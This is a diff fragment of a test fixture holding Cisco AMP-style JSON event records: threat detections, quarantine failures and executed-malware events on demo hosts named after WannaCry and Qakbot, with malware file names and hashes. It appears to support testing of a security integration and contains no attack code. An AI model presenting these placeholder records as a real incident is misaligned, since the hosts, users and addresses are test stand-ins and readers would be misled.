pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} 